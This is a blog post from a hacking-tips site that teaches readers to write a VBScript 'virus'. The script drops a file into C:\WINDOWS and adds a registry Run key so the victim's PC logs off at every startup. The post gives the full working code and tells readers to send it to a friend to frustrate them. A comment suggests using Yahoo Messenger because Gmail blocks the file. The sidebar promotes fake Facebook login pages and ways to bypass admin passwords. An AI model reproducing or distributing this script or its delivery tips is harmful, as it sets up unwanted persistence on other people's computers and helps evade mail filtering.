Recent Articles
Create Virus to Log Off Windows every time at Start up


From today i m starting a new section here on my site, which will help you to learn about virus programming and also you can make small viruses on your PC just using notepad.... :)
This first post of virus programming will tell you about... how you can make a virus that will shutdown a PC Automatically at Startup. Every time when a victim will restart his PC, it will be shutdown.
Ok, just open the notepad and type the paste the following code:
code:
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript. vbs","REG_SZ”
Now save this notepad file with any name having .vbs extension....
Now send it to ur friend.... and Frustrate your friend by shutting down his computer automatically on startup ;)
How to get rid of this virus:
for that just boot ur system in safe mode and then go to directory c:\ windows.... find out wscript.vbs file there.... and delete it :)



3 comments for this post
Leave a reply
Subscribe to:
Post Comments (Atom)
TechByte4U on Facebook
Popular Posts
Windows Genuine Notifications is a problem that every computer operator faces in her life. It notifies you if a copy of Windows XP is not ge...
In this Tutorial i m giving detail description about a firefox Addon Flash and video Download about which i have also told in my last...
last week a person requested here to explain how to make a fake login page of Facebook.. So i am giving a lesson here about making fake ...
Login as administrator Administrator password can be changed easily without knowing its password. Thing needed is just access to that co...
You have no more need to read the long Pdf files line by line. Now feel free, coz your pdf will read out itself for you. Many peo...
These days I spend most of the time with books and laptop in reading and learning new things. A week ago I downloaded an e-book named The H...
Hack Google plus I hope till now all of you know what is google plus, so i am not going to write more about Google plus here. If yo...
In response to query asked by Ameer Hasan Malik Did you forget your windows login password? or want to access Admin account in schoo...
If the partition is deleted, your vital and important data stored on those partitions may become inaccessible which may create many har...
Hello Friends, Gmail and Yahoo don't have facility to add Animated signature and even in gmail you can't add html signatures al...
Nitasha
September 19, 2010 at 12:20 PM
gud hmmm !!!
Unknown
April 2, 2012 at 4:37 PM
but gmail do not accept this file
Surbhi Verma
April 3, 2012 at 11:22 AM
yes, gmail does not accept virus files, try to send it through yahoo messenger.